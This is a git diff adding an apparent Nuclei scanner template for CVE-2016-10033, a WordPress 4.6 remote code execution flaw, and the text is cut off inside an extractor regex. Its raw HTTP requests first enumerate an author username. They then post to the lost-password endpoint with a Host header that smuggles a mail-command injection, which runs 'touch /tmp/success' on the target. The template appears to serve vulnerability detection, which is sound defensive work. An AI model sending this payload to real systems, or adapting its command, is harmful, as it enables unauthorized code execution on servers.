diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml
new file mode 100644
index 0000000000..cdae3cc13f
--- /dev/null
+++ b/cves/2016/CVE-2016-10033.yaml
@@ -0,0 +1,50 @@
+id: CVE-2016-10033
+info:
+ name: Wordpress 4.6 Remote Code Execution
+ author: princechaddha
+ severity: high
+ reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
+ tags: wordpress,cve,cve2016,rce
+
+requests:
+ - raw:
+ - |+
+ GET /?author=1 HTTP/1.1
+ Host: {{Hostname}}
+ Cache-Control: max-age=0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Language: en-US,en;q=0.9
+ Connection: close
+
+ - |+
+ POST /wp-login.php?action=lostpassword HTTP/1.1
+ Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
+ Connection: close
+ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+ Accept: */*
+ Content-Length: 56
+ Content-Type: application/x-www-form-urlencoded
+
+ wp-submit=Get+New+Password&redirect_to=&user_login={{username}}
+
+ unsafe: true
+ extractors:
+ - type: regex
+ name: username
+ internal: true
+ group: 1
+ part: body
+ regex:
+ - 'Author:(?:[A-Za-z0-9 -\_="]+)?